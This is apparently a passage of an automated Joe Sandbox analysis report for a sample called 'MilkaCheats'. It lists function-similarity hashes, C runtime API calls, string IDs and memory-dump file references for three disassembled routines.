                                                                                              • Opcode Fuzzy Hash: 4760746fac3c4e9f1025cd18633cf154bd483382996b60220e1f9b5cc390b365
                                                                                              • Instruction Fuzzy Hash: 8941B374A00218EBCF10DF69C889F9EBBE5AF45314F1481ADF815AB392D731DA46CB91
                                                                                              APIs
                                                                                              • EncodePointer.KERNEL32(00000000,?), ref: 000CA7D2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: EncodePointer
                                                                                              • String ID: MOC$RCC
                                                                                              • API String ID: 2118026453-2084237596
                                                                                              • Opcode ID: 2906cf196bfb5364fc3fdc47aac59e51d6ae56a88d34e5c5cfc10c9a93da397a
                                                                                              • Instruction ID: 92ef26eb841235df4de8f5f6f77f2fe03e793d9a3080e1fdc25a80fb42669963
                                                                                              • Opcode Fuzzy Hash: 2906cf196bfb5364fc3fdc47aac59e51d6ae56a88d34e5c5cfc10c9a93da397a
                                                                                              • Instruction Fuzzy Hash: F2414531A0020DAFCF16DF94C881EEEBBB5FF49308F148069FA0467252D6359956DB62
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 000C75B4
                                                                                              • ___raise_securityfailure.LIBCMT ref: 000C7671
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                              • String ID: q*
                                                                                              • API String ID: 3761405300-3148377056
                                                                                              • Opcode ID: 398951a827003c440b95bccbb8d5f10b7765c617d1ddc718b0e3a6464b570cb0
                                                                                              • Instruction ID: 3db7cce7af20d54ad82b64fe12a53891a52588aab8726c7492887e312fd74d13
                                                                                              • Opcode Fuzzy Hash: 398951a827003c440b95bccbb8d5f10b7765c617d1ddc718b0e3a6464b570cb0
                                                                                              • Instruction Fuzzy Hash: 0111B9BC6106059FD715CF2AE8826413BB4FF4A310B90542AF8088BFB0E3B099C18F45
                                                                                              APIs
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 000C2364
                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000C239C
                                                                                                • Part of subcall function 000C61E0: _Yarn.LIBCPMT ref: 000C61FF
                                                                                                • Part of subcall function 000C61E0: _Yarn.LIBCPMT ref: 000C6223
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                              • String ID: bad locale name
                                                                                              • API String ID: 1908188788-1405518554
                                                                                              • Opcode ID: aa6efe0e5471c82ba776b35d10e5ef416b819394f8c4f4bfb845472738d119e9
                                                                                              • Instruction ID: 3876e95829c3ccf2bcfe6006af5b724eefab0403db5c707a44f2de240725577a
                                                                                              • Opcode Fuzzy Hash: aa6efe0e5471c82ba776b35d10e5ef416b819394f8c4f4bfb845472738d119e9
                                                                                              • Instruction Fuzzy Hash: 94F03071505B909E83309F7A8481947FBE4BF293113948E2FE1DEC3A12D730E544CB6A